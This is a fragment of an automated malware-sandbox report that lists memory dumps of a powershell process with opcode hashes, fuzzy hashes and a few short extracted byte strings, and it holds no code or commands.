                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_7ffb4b380000_powershell.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 80806a3db63862105f55c235aa4f164ee1db4737c2f99688602234c146f674a0
                                                                                                                      • Instruction ID: 450f4101d58acd733fb0bf01cdf1369c4f33bad10cadbd76b6f5d3b385cda5ae
                                                                                                                      • Opcode Fuzzy Hash: 80806a3db63862105f55c235aa4f164ee1db4737c2f99688602234c146f674a0
                                                                                                                      • Instruction Fuzzy Hash: 6B31F9B081D64ECEFBB4AF29CD4ABF932A0FF45315F408139D50E865E2DB386945CA11
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1610226868.00007FFB4B450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B450000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_7ffb4b450000_powershell.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: e48221152d7f8ef1b10ccb27baaab1bae82939ed172ee27979ce4137d04931f4
                                                                                                                      • Instruction ID: a11d50aefda25f9a3c3f4a243bf7a684b9fa0d8edcc936e95a2e9978ef6604de
                                                                                                                      • Opcode Fuzzy Hash: e48221152d7f8ef1b10ccb27baaab1bae82939ed172ee27979ce4137d04931f4
                                                                                                                      • Instruction Fuzzy Hash: 0311B67164EB858FD70A9A3898599603FE0EF5732071541EFD4C6CB1E3D91A9C46C781
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1615882645.00007FFB4B630000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B630000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_7ffb4b630000_powershell.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 94dd57a72124a3456fd3eea5fb2ef4724eb2481bcc934cce07b1b7558da940c6
                                                                                                                      • Instruction ID: 9fe2fb8a48239c8341074eee1a2b56a2db8c6d653b14465b01e902e6d1f3988c
                                                                                                                      • Opcode Fuzzy Hash: 94dd57a72124a3456fd3eea5fb2ef4724eb2481bcc934cce07b1b7558da940c6
                                                                                                                      • Instruction Fuzzy Hash: 071106B390D5894FE3A5EB3CD951574BBD0EF0535070890FAD69DC71B2DA2AAC10C751
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1609007508.00007FFB4B380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B380000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_7ffb4b380000_powershell.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 70bdff8e8b286107a68ad93acbea6c9603f5ac402bbcdca636a0b8f404f4039d
                                                                                                                      • Instruction ID: 9b2d489a178514763b86ba4b88d494df3b9d12a3d42aabaacd30e4aa9b26724c
                                                                                                                      • Opcode Fuzzy Hash: 70bdff8e8b286107a68ad93acbea6c9603f5ac402bbcdca636a0b8f404f4039d
                                                                                                                      • Instruction Fuzzy Hash: E701677111CB0C8FDB44EF0CE451AA5B7E0FB95364F10056DE58AC3665DA36E882CB46
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1609007508.00007FFB4B380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B380000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_7ffb4b380000_powershell.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 60d422bb837d4230df502dbfdb96bb1358563620f275cfa0432fa14c098df5ae
                                                                                                                      • Instruction ID: 184ac5fc03eead45449ed7b555cd285dfb9a25f47da0a81728fbaaf951cf43e4
                                                                                                                      • Opcode Fuzzy Hash: 60d422bb837d4230df502dbfdb96bb1358563620f275cfa0432fa14c098df5ae
                                                                                                                      • Instruction Fuzzy Hash: F3E06D75408A8C8FCB45EF1888598E97FA0FF68200B01019AE909C7131D7619554CB81
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1615882645.00007FFB4B630000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B630000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_7ffb4b630000_powershell.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: (7,$z$_H
                                                                                                                      • API String ID: 0-1287751706
                                                                                                                      • Opcode ID: 359ccb5e0b3e9c62e5f8baf9c313d71cd0f45efc235f0fba32ae7de2cd912e7a
                                                                                                                      • Instruction ID: 8313b398fc587ef42f016bca26dad158145d780ad2d12972fbc53d78ce38c45f
                                                                                                                      • Opcode Fuzzy Hash: 359ccb5e0b3e9c62e5f8baf9c313d71cd0f45efc235f0fba32ae7de2cd912e7a
                                                                                                                      • Instruction Fuzzy Hash: ECF127A290EBC94FE756AB38CC651A4BFE0EF56310B0940FBD18DC71A3DD289806C751
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1615882645.00007FFB4B630000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B630000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_7ffb4b630000_powershell.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 4c50ad1b141ae39c533317ab6ed7dfdecc43199736fb83a2d1784e26132f4357
                                                                                                                      • Instruction ID: 8bb7ce7d972362cec0647529c2c2061126c40f95b944f86cd1e895b2b35ef6dd
                                                                                                                      • Opcode Fuzzy Hash: 4c50ad1b141ae39c533317ab6ed7dfdecc43199736fb83a2d1784e26132f4357
                                                                                                                      • Instruction Fuzzy Hash: 014208A3A0DAC54FE746AA38CC549747FE1EF66310B1851FEC589CB1E3D929E846C381
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1609007508.00007FFB4B380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B380000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_7ffb4b380000_powershell.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: qK$0qK$8qK$8qK$@qK$XqK$XqK$`qK$hqK$xqK$qK
                                                                                                                      • API String ID: 0-3788002995
                                                                                                                      • Opcode ID: 414e3da76309e9862efa58ed9375a716ebdfb185c11ae5117fc7af5a0f03d194
                                                                                                                      • Instruction ID: 0cdebe583dc0429bd0262f27fee16c32b4bef9783056fa80f1e1fb473d3dbafa
                                                                                                                      • Opcode Fuzzy Hash: 414e3da76309e9862efa58ed9375a716ebdfb185c11ae5117fc7af5a0f03d194
                                                                                                                      • Instruction Fuzzy Hash: DB71078360EAD60BF3655A7CEE15024AFC1FF8626071D8EFBF1844B1EB9C5599068392
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1610226868.00007FFB4B450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B450000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_7ffb4b450000_powershell.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: 6YK$ 6YK$ 6YK$5YK
                                                                                                                      • API String ID: 0-1135517306
                                                                                                                      • Opcode ID: b3ac35bfc35206b3c07aee8f82dbdb22595c7a5ca47b9a465d9f83c12f13f6b9
                                                                                                                      • Instruction ID: 4b7acbeb6189127319525573616daefcca337436de030e3c0cc1c43a4418af30
                                                                                                                      • Opcode Fuzzy Hash: b3ac35bfc35206b3c07aee8f82dbdb22595c7a5ca47b9a465d9f83c12f13f6b9
                                                                                                                      • Instruction Fuzzy Hash: AEC13692A0EFC60FE796AAB898555747FD1EF66310B0840FFD28DC71E3D9099C468392